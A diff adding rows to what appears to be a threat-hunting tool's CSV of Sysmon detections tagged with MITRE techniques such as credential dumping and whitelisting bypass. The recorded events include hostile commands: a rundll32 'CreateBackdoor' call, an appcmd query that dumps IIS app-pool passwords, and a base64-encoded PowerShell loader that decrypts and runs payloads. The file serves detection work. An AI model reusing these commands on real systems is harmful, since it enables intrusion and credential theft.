+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:34.659248Z"">
+    </TimeCreated>
+    <EventRecordID>27</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:34.629</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Hid User Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:34.659248Z"">
+    </TimeCreated>
+    <EventRecordID>27</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:34.629</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Hid User Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.581146Z"">
+    </TimeCreated>
+    <EventRecordID>5892</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.420</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010576BFF00</Data>
+    <Data Name=""ProcessId"">2928</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T12:36:03.901088Z"">
+    </TimeCreated>
+    <EventRecordID>244341</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2844"" ThreadID=""3648"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 12:36:03.899</Data>
+    <Data Name=""ProcessGuid"">747F3D96-0A33-5E76-0000-0010B8813D00</Data>
+    <Data Name=""ProcessId"">3696</Data>
+    <Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">whoami - displays logged on user information</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">whoami.exe</Data>
+    <Data Name=""CommandLine"">whoami</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-069C-5E76-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-08DA-5E76-0000-001054382E00</Data>
+    <Data Name=""ParentProcessId"">2632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine (&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-26T04:01:43.567204Z"">
+    </TimeCreated>
+    <EventRecordID>4863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""984"" ThreadID=""2352"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-26 04:01:43.557</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0FA7-5CEA-0000-001064C60A00</Data>
+    <Data Name=""ProcessId"">3908</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-8DBD-5CEA-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-0FA6-5CEA-0000-0010FEC30A00</Data>
+    <Data Name=""ParentProcessId"">3884</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Desktop\info.rar\jjs.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-26T04:01:43.567204Z"">
+    </TimeCreated>
+    <EventRecordID>4863</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""984"" ThreadID=""2352"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-26 04:01:43.557</Data>
+    <Data Name=""ProcessGuid"">365ABB72-0FA7-5CEA-0000-001064C60A00</Data>
+    <Data Name=""ProcessId"">3908</Data>
+    <Data Name=""Image"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Host Process for Windows Services</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\svchost.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-8DBD-5CEA-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-0FA6-5CEA-0000-0010FEC30A00</Data>
+    <Data Name=""ParentProcessId"">3884</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\Desktop\info.rar\jjs.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\Desktop\info.rar\jjs.exe&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:34.448945Z"">
+    </TimeCreated>
+    <EventRecordID>26</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:34.418</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
+    <Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
+    <Data Name=""Description"">SAM Library DLL</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T17:01:34.448945Z"">
+    </TimeCreated>
+    <EventRecordID>26</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""3288"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 17:01:34.418</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
+    <Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
+    <Data Name=""Description"">SAM Library DLL</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
+    </TimeCreated>
+    <EventRecordID>243550</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
+    <Data Name=""ProcessId"">8160</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
